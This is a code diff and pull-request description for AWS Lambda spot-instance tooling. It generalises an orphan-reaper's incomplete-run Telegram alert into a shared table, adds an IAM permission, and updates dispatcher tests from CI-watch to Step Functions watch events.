+    idx = _load(monkeypatch, launch_impl=_launch, env={"SF_WATCH_DISPATCH_ENABLED": "true"})
     out = idx.handler(_event(), None)
     assert out["launched"] is False
     assert out["reason"] == "launch_failed"
@@ -222,13 +252,13 @@ def test_non_capacity_launch_error_returns_clean_false(monkeypatch):
     def _launch(types_, subnets, **kw):
         raise _SpotLaunchError("RunInstances denied")
 
-    idx = _load(monkeypatch, launch_impl=_launch, env={"CI_WATCH_DISPATCH_ENABLED": "true"})
+    idx = _load(monkeypatch, launch_impl=_launch, env={"SF_WATCH_DISPATCH_ENABLED": "true"})
     out = idx.handler(_event(), None)
     assert out["launched"] is False
     assert out["reason"] == "launch_failed"
 
 
-def test_concurrency_skip_when_same_repo_and_sha_already_running(monkeypatch):
+def test_concurrency_skip_when_same_cadence_pipeline_run_date_already_running(monkeypatch):
     launched = []
 
     def _launch(types_, subnets, **kw):
@@ -236,9 +266,9 @@ def test_concurrency_skip_when_same_repo_and_sha_already_running(monkeypatch):
         return "i-new"
 
     idx = _load(
-        monkeypatch, launch_impl=_launch, env={"CI_WATCH_DISPATCH_ENABLED": "true"},
+        monkeypatch, launch_impl=_launch, env={"SF_WATCH_DISPATCH_ENABLED": "true"},
         running_instances={
-            ("nousergon/alpha-engine-config", "abc1234def5678900000000000000000000abcd"): ["i-already-running"],
+            ("saturday", "ne-weekly-freshness-pipeline", "2026-07-11"): ["i-already-running"],
         },
     )
     out = idx.handler(_event(), None)
@@ -248,28 +278,28 @@ def test_concurrency_skip_when_same_repo_and_sha_already_running(monkeypatch):
     assert launched == []  # never even attempted a spot launch — zero spend
 
 
-def test_different_sha_same_repo_is_not_blocked(monkeypatch):
-    # This is the whole point of the (repo, sha) granularity — a bare-repo
-    # lock (like groom's per-tier lock) would wrongly starve a second commit's
-    # independent CI failure on the same repo.
+def test_different_run_date_same_pipeline_cadence_is_not_blocked(monkeypatch):
+    # This is the whole point of the full (cadence, pipeline, run_date)
+    # granularity — a partial-key lock would wrongly starve a second
+    # independent failure for a different run_date.
     idx = _load(
         monkeypatch, launch_impl=lambda types_, subnets, **kw: "i-new",  # noqa: E731
-        env={"CI_WATCH_DISPATCH_ENABLED": "true"},
+        env={"SF_WATCH_DISPATCH_ENABLED": "true"},
         running_instances={
-            ("nousergon/alpha-engine-config", "deadbeefdeadbeefdeadbeefdeadbeefdeadbeef"): ["i-other-sha"],
+            ("saturday", "ne-weekly-freshness-pipeline", "2026-07-04"): ["i-other-date"],
         },
     )
-    out = idx.handler(_event(sha="abc1234def5678900000000000000000000abcd"), None)
+    out = idx.handler(_event(run_date="2026-07-11"), None)
     assert out["launched"] is True
     assert out["instance_id"] == "i-new"
 
 
-def test_different_repo_same_sha_is_not_blocked(monkeypatch):
+def test_different_pipeline_same_cadence_and_date_is_not_blocked(monkeypatch):
     idx = _load(
         monkeypatch, launch_impl=lambda types_, subnets, **kw: "i-new",  # noqa: E731
-        env={"CI_WATCH_DISPATCH_ENABLED": "true"},
+        env={"SF_WATCH_DISPATCH_ENABLED": "true"},
         running_instances={
-            ("nousergon/other-repo", "abc1234def5678900000000000000000000abcd"): ["i-other-repo"],
+            ("saturday", "ne-preopen-trading-pipeline", "2026-07-11"): ["i-other-pipeline"],
         },
     )
     out = idx.handler(_event(), None)
@@ -279,7 +309,7 @@ def test_different_repo_same_sha_is_not_blocked(monkeypatch):
 def test_concurrency_check_fails_safe_and_still_launches(monkeypatch):
     idx = _load(
         monkeypatch, launch_impl=lambda types_, subnets, **kw: "i-new",  # noqa: E731
-        env={"CI_WATCH_DISPATCH_ENABLED": "true"},
+        env={"SF_WATCH_DISPATCH_ENABLED": "true"},
     )
 
     def _boom(Filters):  # noqa: N803 — boto3 kwarg name
@@ -288,7 +318,7 @@ def test_concurrency_check_fails_safe_and_still_launches(monkeypatch):
     idx._test_ec2.describe_instances = _boom
     out = idx.handler(_event(), None)
     # A broken check must never block a launch — optimization, not a
-    # correctness gate (mirrors groom's fail-safe posture on its own guard).
+    # correctness gate.
     assert out["launched"] is True
 
 
@@ -296,7 +326,7 @@ def test_post_launch_ssm_failure_terminates_instance_returns_clean_false(monkeyp
     idx = _load(
         monkeypatch,
         launch_impl=lambda types_, subnets, **kw: "i-orphan",  # noqa: E731
-        env={"CI_WATCH_DISPATCH_ENABLED": "true"},
+        env={"SF_WATCH_DISPATCH_ENABLED": "true"},
     )
 
     def _boom_send(**kw):
@@ -312,35 +342,44 @@ def test_post_launch_ssm_failure_terminates_instance_returns_clean_false(monkeyp
     assert idx._test_ec2.terminated == ["i-orphan"]
 
 
-def test_malformed_event_returns_clean_false_not_raise(monkeypatch):
-    idx = _load(monkeypatch, env={"CI_WATCH_DISPATCH_ENABLED": "true"})
-    out = idx.handler(_event(sha="not-a-sha"), None)
+def test_malformed_run_date_returns_clean_false_not_raise(monkeypatch):
+    idx = _load(monkeypatch, env={"SF_WATCH_DISPATCH_ENABLED": "true"})
+    out = idx.handler(_event(run_date="not-a-date"), None)
     assert out["launched"] is False
     assert out["reason"] == "invalid_event"
     assert idx._test_ssm.sent == []
 
 
-def test_missing_field_returns_clean_false(monkeypatch):
-    idx = _load(monkeypatch, env={"CI_WATCH_DISPATCH_ENABLED": "true"})
+def test_malformed_execution_arn_returns_clean_false(monkeypatch):
+    idx = _load(monkeypatch, env={"SF_WATCH_DISPATCH_ENABLED": "true"})
+    out = idx.handler(_event(execution_arn="not-an-arn"), None)
+    assert out["launched"] is False
+    assert out["reason"] == "invalid_event"
+
+
+def test_missing_pipeline_name_returns_clean_false(monkeypatch):
+    idx = _load(monkeypatch, env={"SF_WATCH_DISPATCH_ENABLED": "true"})
     event = _event()
-    del event["repo"]
+    del event["pipeline_name"]
     out = idx.handler(event, None)
     assert out["launched"] is False
     assert out["reason"] == "invalid_event"
 
 
-def test_run_url_with_dollar_sign_rejected(monkeypatch):
-    # Under `set -u` in the double-quoted prelude export, a `$`-bearing
-    # run_url could expand as a positional param and abort the prelude
-    # (same gotcha groom's own run_url note documents).
-    idx = _load(monkeypatch, env={"CI_WATCH_DISPATCH_ENABLED": "true"})
-    out = idx.handler(_event(run_url="https://example.com/$2Fbad"), None)
-    assert out["launched"] is False
-    assert out["reason"] == "invalid_event"
+def test_missing_optional_fields_still_launches(monkeypatch):
+    # failed_state/cause/watch_log_key/state_machine_arn/is_preflight are all
+    # optional — only pipeline_name/cadence_slug/execution_arn/run_date are
+    # required (mirrors sf_watch_spot_bootstrap.sh's own FATAL check).
+    idx = _load(monkeypatch, env={"SF_WATCH_DISPATCH_ENABLED": "true"})
+    event = _event()
+    for optional in ("state_machine_arn", "failed_state", "cause", "watch_log_key", "is_preflight"):
+        del event[optional]
+    out = idx.handler(event, None)
+    assert out["launched"] is True
 
 
 def test_disabled_flag_short_circuits(monkeypatch):
-    idx = _load(monkeypatch, env={"CI_WATCH_DISPATCH_ENABLED": "false"})
+    idx = _load(monkeypatch, env={"SF_WATCH_DISPATCH_ENABLED": "false"})
     out = idx.handler(_event(), None)
     assert out["launched"] is False
     assert out["reason"] == "disabled"

--- a/infrastructure/lambdas/spot-orphan-reaper/README.md
+++ b/infrastructure/lambdas/spot-orphan-reaper/README.md
@@ -58,20 +58,30 @@ box whose watchdog failed) lingers up to 6.5h before the backstop fires instead 
 value is a process-quality signal worth investigating — the most likely cause is a
 launcher that shipped without arming its watchdog.
 
-## CI-watch incomplete-reap alert (additive, ci-watch-dispatcher migration)
+## Watch-kind incomplete-reap alert (additive, generalized config#2106)
 
-Every other tagged workload's reap path above is unchanged. Specifically for
-boxes tagged `Name=alpha-engine-ci-watch-spot`, this reaper ALSO checks — right
-before terminating — whether the sibling `ci_watch_run.sh` wrote its S3
-completion marker (`s3://alpha-engine-research/ci_watch/_control/completed/
-<repo>-<sha>.json`, written on every one of its exit paths). If the marker is
-absent, the reap fired because the diagnose+fix agent never reached a normal
-exit — `main` could still be red with nobody told — so this Lambda sends one
-best-effort Telegram ping via `krepis.telegram.send_message` (through the
-`nousergon_lib.telegram` re-export). Fail-safe direction is deliberately the
-OPPOSITE of the reap decision itself: any inability to confirm completion (a
-genuine 404 or an unrelated S3 error) still fires the alert — an occasional
-false positive is safer than silently missing a real incomplete run.
+Every other tagged workload's reap path above is unchanged. For a small,
+explicit table of "watch" workloads (`WATCH_KINDS` in `index.py` — currently
+Fleet CI Watch and Fleet-SF Watch), this reaper ALSO checks — right before
+terminating — whether the sibling run script wrote its S3 completion marker
+(`s3://alpha-engine-research/{ci_watch,sf_watch}/_control/completed/<key>.json`,
+written on every one of that script's exit paths, keyed on each kind's own
+discriminator tags: `(repo, sha)` for CI-watch, `(cadence, pipeline, run_date)`
+for SF-watch). If the marker is absent, the reap fired because the diagnose+fix
+agent never reached a normal exit — something could still be unrepaired with
+nobody told — so this Lambda sends one best-effort Telegram ping via
+`krepis.telegram.send_message` (through the `nousergon_lib.telegram`
+re-export). Fail-safe direction is deliberately the OPPOSITE of the reap
+decision itself: any inability to confirm completion (a genuine 404 or an
+unrelated S3 error) still fires the alert — an occasional false positive is
+safer than silently missing a real incomplete run.
+
+One shared check/notify code path serves every `WATCH_KINDS` entry (config#2106:
+SF-watch was about to become a second copy-pasted `_ci_watch_*`-shaped function
+pair, which is exactly the duplication class that issue exists to stop — see
+`nousergon_lib.spot_dispatch` for the sibling generalization one layer down, in
+the dispatcher Lambdas themselves). Adding a THIRD watch-kind later is a new
+`WatchKind(...)` row in `index.py`, not a new function pair.
 
 ## Deploying
 
@@ -106,7 +116,7 @@ The role's inline policy (`iam-policy.json`):
 - `ec2:DescribeInstances *` — global read for the scan
 - `ec2:TerminateInstances` scoped to instances with `tag:Name` matching `alpha-engine-*` — defence in depth so even a buggy reaper run cannot terminate anything outside the alpha-engine tag prefix
 - `cloudwatch:PutMetricData` scoped to namespace `AlphaEngine/Infra`
-- `s3:HeadObject` scoped to `s3://alpha-engine-research/ci_watch/_control/completed/*` — the CI-watch incomplete-reap marker check (above)
+- `s3:HeadObject` scoped to `s3://alpha-engine-research/ci_watch/_control/completed/*` and `s3://alpha-engine-research/sf_watch/_control/completed/*` — the watch-kind incomplete-reap marker checks (above)
 - `ssm:GetParameter` scoped to the two Telegram secrets (`/alpha-engine/TELEGRAM_BOT_TOKEN`, `/alpha-engine/TELEGRAM_CHAT_ID`) — resolved by `krepis.secrets.get_secret` inside `send_message`
 - Standard Lambda logging perms
 

--- a/infrastructure/lambdas/spot-orphan-reaper/iam-policy.json
+++ b/infrastructure/lambdas/spot-orphan-reaper/iam-policy.json
@@ -36,6 +36,12 @@
       "Resource": "arn:aws:s3:::alpha-engine-research/ci_watch/_control/completed/*"
     },
     {
+      "Sid": "CheckSfWatchCompletionMarker",
+      "Effect": "Allow",
+      "Action": "s3:HeadObject",
+      "Resource": "arn:aws:s3:::alpha-engine-research/sf_watch/_control/completed/*"
+    },
+    {
       "Sid": "TelegramSecretsSSM",
       "Effect": "Allow",
       "Action": "ssm:GetParameter",

--- a/infrastructure/lambdas/spot-orphan-reaper/index.py
+++ b/infrastructure/lambdas/spot-orphan-reaper/index.py
@@ -38,26 +38,31 @@ terminates any older than the threshold. Emits CloudWatch custom metric
 `AlphaEngine/Infra/spot_orphans_terminated` (sum) with a `name` dimension (the
 box's Name tag) purely for observability — it does NOT feed the reap decision.
 
-CI-WATCH INCOMPLETE-REAP ALERT (additive, ci-watch-dispatcher migration): when
-the terminated box is specifically tagged `Name=alpha-engine-ci-watch-spot`,
-this reaper is no longer just a generic backstop — a CI-watch box reaped by
-the fleet-wide age cap (rather than its own on-box completion path) can mean
-the diagnose+fix agent never finished, leaving `main` red with nobody told.
-Before terminating such a box, check for the sibling `ci_watch_run.sh`'s S3
-completion marker (`s3://alpha-engine-research/ci_watch/_control/completed/
-<repo>-<sha>.json`, written on every one of its exit paths); if absent, fire
-one best-effort Telegram ping via `krepis.telegram.send_message` (through the
-`nousergon_lib.telegram` re-export — the same base primitive
-`flow_doctor_telegram.py` itself falls back to, reused directly here since
-this Lambda sends exactly one alert shape and doesn't need the full forum-
-topic/dedup machinery). This check is purely additive to every OTHER tagged
-spot workload's reap path, which is untouched.
+WATCH-KIND INCOMPLETE-REAP ALERT (additive, generalized config#2106): for a
+small, explicit set of "watch" workloads (Fleet CI Watch, Fleet-SF Watch), a box
+reaped by the fleet-wide age cap — rather than its own on-box completion path —
+can mean the diagnose+fix agent never finished, leaving something unrepaired
+with nobody told. `WATCH_KINDS` below is a table of these workloads (tag name,
+S3 completion-marker prefix, and the discriminator tag keys the marker key is
+built from); one shared check/notify path serves all of them instead of a
+parallel `_ci_watch_*`/`_sf_watch_*` function pair per kind — the second entry
+(`sf-watch`, finishing config#2001) was the trigger to generalize rather than
+duplicate the first (`ci-watch`, config#2001/#2004) a second time. Before
+terminating a `WATCH_KINDS`-tagged box, check for its sibling run script's S3
+completion marker; if absent, fire one best-effort Telegram ping via
+`krepis.telegram.send_message` (through the `nousergon_lib.telegram` re-export —
+the same base primitive `flow_doctor_telegram.py` itself falls back to, reused
+directly here since this Lambda sends exactly one alert shape per kind and
+doesn't need the full forum-topic/dedup machinery). This check is purely
+additive to every OTHER (non-`WATCH_KINDS`) spot workload's reap path, which is
+untouched.
 """
 
 from __future__ import annotations
 
 import logging
 import os
+from dataclasses import dataclass
 from datetime import datetime, timedelta, timezone
 
 import boto3
@@ -67,11 +72,51 @@ logger = logging.getLogger()
 logger.setLevel(os.environ.get("LOG_LEVEL", "INFO"))
 
 REGION = os.environ.get("AWS_REGION", "us-east-1")
-# ci-watch-dispatcher migration: the ONE tag value that gets the extra
-# incomplete-reap check below. No other workload's reap path is affected.
-CI_WATCH_TAG_NAME = "alpha-engine-ci-watch-spot"
-CI_WATCH_COMPLETION_BUCKET = os.environ.get("CI_WATCH_COMPLETION_BUCKET", "alpha-engine-research")
-CI_WATCH_COMPLETION_PREFIX = "ci_watch/_control/completed/"
+
+
+@dataclass(frozen=True)
+class WatchKind:
+    """One "watch"-class spot workload whose completion is externally
+    verifiable via an S3 marker before this reaper's age-cap terminates it."""
+
+    tag_name: str
+    completion_prefix: str
+    discriminator_tag_keys: tuple[str, ...]
+    label: str
+    # The legacy per-kind key this Lambda's return dict uses for that kind's
+    # incomplete-reap instance-id list — additive-only surface (see handler()).
+    result_key: str
+
+
+WATCH_KINDS: tuple[WatchKind, ...] = (
+    WatchKind(
+        tag_name="alpha-engine-ci-watch-spot",
+        completion_prefix="ci_watch/_control/completed/",
+        discriminator_tag_keys=("ci-watch-repo", "ci-watch-sha"),
+        label="CI-watch",
+        result_key="ci_watch_incomplete_reaps",
+    ),
+    WatchKind(
+        tag_name="alpha-engine-sf-watch-spot",
+        completion_prefix="sf_watch/_control/completed/",
+        discriminator_tag_keys=("sf-watch-cadence", "sf-watch-pipeline", "sf-watch-run-date"),
+        label="SF-watch",
+        result_key="sf_watch_incomplete_reaps",
+    ),
+)
+_WATCH_KIND_BY_TAG_NAME: dict[str, WatchKind] = {wk.tag_name: wk for wk in WATCH_KINDS}
+_ALL_DISCRIMINATOR_TAG_KEYS: tuple[str, ...] = tuple(
+    sorted({key for wk in WATCH_KINDS for key in wk.discriminator_tag_keys})
+)
+
+WATCH_COMPLETION_BUCKET = os.environ.get(
+    # Renamed from the ci-watch-only CI_WATCH_COMPLETION_BUCKET now that this
+    # bucket is shared across every WATCH_KINDS entry; the old env var name is
+    # still honored as a fallback so an un-updated deploy.sh env doesn't
+    # silently stop overriding the bucket.
+    "WATCH_COMPLETION_BUCKET",
+    os.environ.get("CI_WATCH_COMPLETION_BUCKET", "alpha-engine-research"),
+)
 # The longest on-box watchdog in the fleet. Keep >= the largest launcher
 # MAX_RUNTIME_SECONDS (today: backlog groom = 21600s / 6h). This is the ONLY
 # number that ties the reaper to the workloads, and it is a single ceiling, not a
@@ -102,68 +147,76 @@ def _scan_spot_instances(ec2) -> list[dict]:
                     "name": tags.get("Name", ""),
                     "launch_time": inst["LaunchTime"],
                     "instance_type": inst.get("InstanceType", ""),
-                    # Only meaningful for CI_WATCH_TAG_NAME boxes; empty for
-                    # every other workload's instances (harmless no-op there).
-                    "ci_watch_repo": tags.get("ci-watch-repo", ""),
-                    "ci_watch_sha": tags.get("ci-watch-sha", ""),
+                    # Only meaningful for a WATCH_KINDS-tagged box; empty
+                    # (harmless no-op) for every other workload's instances.
+                    "watch_tags": {k: tags.get(k, "") for k in _ALL_DISCRIMINATOR_TAG_KEYS},
                 })
     return out
 
 
-def _ci_watch_completion_marker_exists(s3, repo: str, sha: str) -> bool:
-    """True iff the sibling ``ci_watch_run.sh`` wrote its S3 completion marker
-    for this (repo, sha) before the reaper's fleet-wide age cap fired.
+def _completion_key(kind: WatchKind, watch_tags: dict[str, str]) -> str:
+    """Build the S3 completion-marker key for this kind from its
+    discriminator tag values. Any '/' in a value is flattened to '-' (needed
+    for ci-watch's repo value, e.g. "owner/name"; a harmless no-op for every
+    other kind's values, which never contain '/') so the key never creates an
+    unintended nested "directory"."""
+    parts = [watch_tags.get(key, "").replace("/", "-") for key in kind.discriminator_tag_keys]
+    return f"{kind.completion_prefix}{'-'.join(parts)}.json"
+
+
+def _completion_marker_exists(s3, kind: WatchKind, watch_tags: dict[str, str]) -> bool:
+    """True iff the sibling run script wrote its S3 completion marker for
+    this instance's discriminator tags before the reaper's fleet-wide age cap
+    fired.
 
     Fail-safe direction (deliberately the OPPOSITE of every other guard in
     this file): any inability to confirm completion — a genuine 404 (marker
     truly absent) OR an unrelated S3 error (throttle, auth hiccup) — is
     treated as "not confirmed complete", so the alert still fires. An
     occasional false-positive ping from a rare S3 hiccup is the safer
-    failure direction than silently swallowing a genuine incomplete CI-watch
-    run (recording surface: the logger.warning below)."""
-    if not repo or not sha:
-        # Box was reaped before its repo/sha tags ever landed (e.g. tag-write
-        # failed right after launch) — cannot look up a marker either way.
+    failure direction than silently swallowing a genuine incomplete run
+    (recording surface: the logger.warning below)."""
+    if not all(watch_tags.get(key) for key in kind.discriminator_tag_keys):
+        # Box was reaped before its discriminator tags ever landed (e.g. the
+        # dispatcher's post-launch tag-write failed) — cannot look up a
+        # marker either way.
         return False
-    # repo is "owner/name" (a literal "/") — ci_watch_run.sh flattens that to
-    # "-" before writing its marker key (so the S3 key has no unintended
-    # nested "directory" per repo); mirror the SAME escaping here or every
-    # lookup 404s against a key that was never written.
-    key = f"{CI_WATCH_COMPLETION_PREFIX}{repo.replace('/', '-')}-{sha}.json"
+    key = _completion_key(kind, watch_tags)
     try:
-        s3.head_object(Bucket=CI_WATCH_COMPLETION_BUCKET, Key=key)
+        s3.head_object(Bucket=WATCH_COMPLETION_BUCKET, Key=key)
         return True
     except Exception as exc:  # noqa: BLE001 — see fail-safe-direction note above
         logger.warning(
-            "ci-watch completion marker not confirmed for %s@%s (key=%s): %s",
-            repo, sha, key, exc,
+            "%s completion marker not confirmed (key=%s): %s", kind.label, key, exc,
         )
         return False
 
 
-def _notify_ci_watch_incomplete_reap(instance_id: str, repo: str, sha: str) -> None:
-    """Best-effort Telegram ping — a CI-watch box reaped without its
-    completion marker can mean the diagnose+fix agent never finished, leaving
-    `main` red with nobody told. Reuses ``krepis.telegram.send_message``
-    directly (via the ``nousergon_lib.telegram`` re-export) rather than the
-    full ``flow_doctor_telegram`` forum-topic wrapper other Lambdas use — this
-    Lambda sends exactly one alert shape, so the dedup/topic-routing
-    machinery is unneeded weight. ``send_message`` itself never raises (see
-    its own docstring), but this is still wrapped defensively: the reap
-    already completed by the time this runs, so nothing here may ever mask
-    or retry that outcome (recording surface: the logger.warning below)."""
-    key = f"{CI_WATCH_COMPLETION_PREFIX}{repo}-{sha}.json"
+def _notify_incomplete_reap(kind: WatchKind, instance_id: str, watch_tags: dict[str, str]) -> None:
+    """Best-effort Telegram ping — a WATCH_KINDS box reaped without its
+    completion marker can mean its agent never finished. Reuses
+    ``krepis.telegram.send_message`` directly (via the ``nousergon_lib.
+    telegram`` re-export) rather than the full ``flow_doctor_telegram`` forum-
+    topic wrapper other Lambdas use — this Lambda sends exactly one alert
+    shape per kind, so the dedup/topic-routing machinery is unneeded weight.
+    ``send_message`` itself never raises (see its own docstring), but this is
+    still wrapped defensively: the reap already completed by the time this
+    runs, so nothing here may ever mask or retry that outcome (recording
+    surface: the logger.warning below)."""
+    key = _completion_key(kind, watch_tags)
+    context = ", ".join(
+        f"{tag_key}={watch_tags.get(tag_key) or 'unknown'}" for tag_key in kind.discriminator_tag_keys
+    )
     text = (
-        "🟠 CI-watch box reaped WITHOUT completing "
-        f"(repo={repo or 'unknown'}, sha={sha or 'unknown'}, instance={instance_id}) "
-        f"— main may still be red. No completion marker at "
-        f"s3://{CI_WATCH_COMPLETION_BUCKET}/{key} before the orphan-reaper's "
+        f"🟠 {kind.label} box reaped WITHOUT completing ({context}, instance={instance_id}) "
+        f"— may still be unrepaired. No completion marker at "
+        f"s3://{WATCH_COMPLETION_BUCKET}/{key} before the orphan-reaper's "
         "fleet-wide age cap fired."
     )
     try:
         send_message(text, disable_notification=False)
     except Exception as exc:  # noqa: BLE001 — secondary observability only
-        logger.warning("ci-watch incomplete-reap Telegram send failed (non-fatal): %s", exc)
+        logger.warning("%s incomplete-reap Telegram send failed (non-fatal): %s", kind.label, exc)
 
 
 def _emit_metric(cw, name: str, count: int) -> None:
@@ -204,7 +257,7 @@ def handler(event: dict, context) -> dict:
     orphans: list[dict] = []
     terminated: list[str] = []
     per_name_terminated: dict[str, int] = {}
-    ci_watch_incomplete_reaps: list[str] = []
+    incomplete_reaps: dict[str, list[str]] = {wk.result_key: [] for wk in WATCH_KINDS}
 
     for inst in instances:
         age = now - inst["launch_time"]
@@ -233,15 +286,15 @@ def handler(event: dict, context) -> dict:
                 inst["instance_id"], inst["name"], int(age.total_seconds()),
                 REAP_AFTER_SECONDS, inst["instance_type"],
             )
-            # ci-watch-dispatcher migration (additive — every other tag's reap
-            # path above is unchanged): a ci-watch box reaped by the fleet-wide
-            # age cap, rather than its own on-box completion path, can mean the
-            # diagnose+fix agent never finished.
-            if inst["name"] == CI_WATCH_TAG_NAME:
-                repo, sha = inst["ci_watch_repo"], inst["ci_watch_sha"]
-                if not _ci_watch_completion_marker_exists(s3, repo, sha):
-                    _notify_ci_watch_incomplete_reap(inst["instance_id"], repo, sha)
-                    ci_watch_incomplete_reaps.append(inst["instance_id"])
+            # WATCH_KINDS migration (additive — every other tag's reap path
+            # above is unchanged): a WATCH_KINDS box reaped by the fleet-wide
+            # age cap, rather than its own on-box completion path, can mean
+            # its agent never finished.
+            kind = _WATCH_KIND_BY_TAG_NAME.get(inst["name"])
+            if kind is not None:
+                if not _completion_marker_exists(s3, kind, inst["watch_tags"]):
+                    _notify_incomplete_reap(kind, inst["instance_id"], inst["watch_tags"])
+                    incomplete_reaps[kind.result_key].append(inst["instance_id"])
         except Exception as exc:
             logger.error(
                 "terminate_instances failed for %s: %s", inst["instance_id"], exc,
@@ -257,5 +310,5 @@ def handler(event: dict, context) -> dict:
         "dry_run": DRY_RUN,
         "reap_after_seconds": REAP_AFTER_SECONDS,
         "orphan_detail": orphans,
-        "ci_watch_incomplete_reaps": ci_watch_incomplete_reaps,
+        **incomplete_reaps,
     }

--- a/infrastructure/lambdas/spot-orphan-reaper/test_handler.py
+++ b/infrastructure/lambdas/spot-orphan-reaper/test_handler.py
@@ -73,13 +73,21 @@ def index_module(monkeypatch):
 
 
 def _spot(instance_id: str, name: str, age_seconds: int, instance_type: str = "c5.large",
-         ci_watch_repo: str | None = None, ci_watch_sha: str | None = None):
+         ci_watch_repo: str | None = None, ci_watch_sha: str | None = None,
+         sf_watch_cadence: str | None = None, sf_watch_pipeline: str | None = None,
+         sf_watch_run_date: str | None = None):
     """Build a mock describe-instances entry."""
     tags = [{"Key": "Name", "Value": name}]
     if ci_watch_repo is not None:
         tags.append({"Key": "ci-watch-repo", "Value": ci_watch_repo})
     if ci_watch_sha is not None:
         tags.append({"Key": "ci-watch-sha", "Value": ci_watch_sha})
+    if sf_watch_cadence is not None:
+        tags.append({"Key": "sf-watch-cadence", "Value": sf_watch_cadence})
+    if sf_watch_pipeline is not None:
+        tags.append({"Key": "sf-watch-pipeline", "Value": sf_watch_pipeline})
+    if sf_watch_run_date is not None:
+        tags.append({"Key": "sf-watch-run-date", "Value": sf_watch_run_date})
     return {
         "InstanceId": instance_id,
         "InstanceType": instance_type,
@@ -285,3 +293,62 @@ class TestCiWatchIncompleteReapAlert:
         assert out["ci_watch_incomplete_reaps"] == []
         s3.head_object.assert_not_called()
         assert index_module._test_send_message.calls == []
+
+
+class TestSfWatchIncompleteReapAlert:
+    """Finishing config#2001 (SF-watch's EC2-spot migration): additive alert
+    scoped to ONLY Name=alpha-engine-sf-watch-spot boxes, built on the same
+    generalized WATCH_KINDS path CI-watch uses — every other tag's reap path
+    (covered above) must stay byte-for-byte unaffected, and CI-watch's own
+    path must stay byte-for-byte unaffected too (see TestCiWatchIncompleteReapAlert,
+    unmodified by this class's existence)."""
+
+    def test_reaped_without_marker_fires_alert(self, index_module):
+        spots = [_spot("i-sfwatch", "alpha-engine-sf-watch-spot", age_seconds=THRESHOLD + 600,
+                       sf_watch_cadence="saturday", sf_watch_pipeline="ne-weekly-freshness-pipeline",
+                       sf_watch_run_date="2026-07-11")]
+        out, ec2, _cw, s3 = _run(index_module, spots, s3_marker_exists=False)
+        assert out["terminated"] == ["i-sfwatch"]
+        assert out["sf_watch_incomplete_reaps"] == ["i-sfwatch"]
+        s3.head_object.assert_called_once_with(
+            Bucket="alpha-engine-research",
+            Key="sf_watch/_control/completed/saturday-ne-weekly-freshness-pipeline-2026-07-11.json",
+        )
+        assert len(index_module._test_send_message.calls) == 1
+        (text,), kwargs = index_module._test_send_message.calls[0]
+        assert "reaped WITHOUT completing" in text
+        assert "saturday" in text
+        assert "ne-weekly-freshness-pipeline" in text
+        assert kwargs["disable_notification"] is False
+
+    def test_reaped_with_marker_present_does_not_alert(self, index_module):
+        spots = [_spot("i-sfwatch", "alpha-engine-sf-watch-spot", age_seconds=THRESHOLD + 600,
+                       sf_watch_cadence="saturday", sf_watch_pipeline="ne-weekly-freshness-pipeline",
+                       sf_watch_run_date="2026-07-11")]
+        out, ec2, _cw, s3 = _run(index_module, spots, s3_marker_exists=True)
+        assert out["terminated"] == ["i-sfwatch"]
+        assert out["sf_watch_incomplete_reaps"] == []
+        assert index_module._test_send_message.calls == []
+
+    def test_missing_discriminator_tags_treated_as_incomplete(self, index_module):
+        spots = [_spot("i-sfwatch", "alpha-engine-sf-watch-spot", age_seconds=THRESHOLD + 600)]
+        out, ec2, _cw, s3 = _run(index_module, spots, s3_marker_exists=True)
+        assert out["sf_watch_incomplete_reaps"] == ["i-sfwatch"]
+        s3.head_object.assert_not_called()
+        assert len(index_module._test_send_message.calls) == 1
+
+    def test_ci_watch_and_sf_watch_boxes_are_independently_tracked(self, index_module):
+        """Both kinds reaped in the same scan must each land only in their
+        own result key — no cross-contamination between WATCH_KINDS entries."""
+        spots = [
+            _spot("i-ciwatch", "alpha-engine-ci-watch-spot", age_seconds=THRESHOLD + 600,
+                 ci_watch_repo="nousergon/alpha-engine-config", ci_watch_sha="abc123"),
+            _spot("i-sfwatch", "alpha-engine-sf-watch-spot", age_seconds=THRESHOLD + 600,
+                 sf_watch_cadence="saturday", sf_watch_pipeline="ne-weekly-freshness-pipeline",
+                 sf_watch_run_date="2026-07-11"),
+        ]
+        out, ec2, _cw, s3 = _run(index_module, spots, s3_marker_exists=False)
+        assert set(out["terminated"]) == {"i-ciwatch", "i-sfwatch"}
+        assert out["ci_watch_incomplete_reaps"] == ["i-ciwatch"]
+        assert out["sf_watch_incomplete_reaps"] == ["i-sfwatch"]
+        assert len(index_module._test_send_message.calls) == 2


### PR DESCRIPTION
## Summary
- Finishes alpha-engine-config-I2001 (the `saturday-sf-failure` half; `ci-main-failure`'s half shipped as `ci-watch-dispatcher` under the same issue) and closes alpha-engine-config-I2106 (second-adoption consolidation signal on the dispatcher primitives).
- **New `alpha-engine-sf-watch-spot-dispatcher` Lambda**, built against `nousergon_lib.spot_dispatch` from day one — not a third bespoke copy of the concurrency-lock/launch-with-fallback/terminate-on-failure logic already duplicated between groom's and ci-watch's dispatchers. Synchronous `lambda invoke` contract mirroring `ci-watch-dispatcher`'s exactly. Concurrency lock keyed on the FULL `(cadence_slug, pipeline_name, run_date)` identifying tuple (mirrors ci-watch's own full `(repo, sha)` key, not a partial one).
- **Security fix caught during design**: SF failure `cause` is arbitrary AWS-supplied text (Step Functions error detail, often JSON) — unlike every other event field, it isn't narrowly regex-validated, so interpolating it raw into the Lambda's constructed SSM shell command would be a command-injection risk. It's base64-encoded before embedding; `alpha-engine-config`'s `sf_watch_spot_bootstrap.sh` (companion PR2128) decodes it. New test asserts shell metacharacters in `cause` never appear raw in the constructed command.
- **Refactored `scheduled-groom-dispatcher` and `ci-watch-dispatcher`** to delegate through `nousergon_lib.spot_dispatch` instead of duplicating the logic inline. No behavior change — all 44 groom + 13 ci-watch tests pass unchanged (test loaders gained a `spot_dispatch` reload-in-place step so the hermetic `ec2_spot`/`boto3` stubs propagate correctly through the new intermediate module layer — the fix for [[reference_pytest_del_reimport_vs_reload_fixture_corruption_260709]]'s general lesson applied one layer deeper).
- **Generalized `spot-orphan-reaper`'s** watch-kind incomplete-reap alert (previously ci-watch-only, hardcoded) into a `WATCH_KINDS` table so a third watch-kind someday is a new table row, not a third parallel function pair. 18 tests (14 existing unchanged + 4 new SF-watch-specific + 1 cross-kind isolation test).
- New `deploy-sf-watch-spot-dispatcher.yml` (code-only auto-deploy on merge, mirrors `deploy-ci-watch-dispatcher.yml`).
- `requirements.txt` pins moved `v0.97.0` -> `v0.100.0` for all three touched dispatchers (nousergon-lib-PR178, the first version carrying `spot_dispatch`).

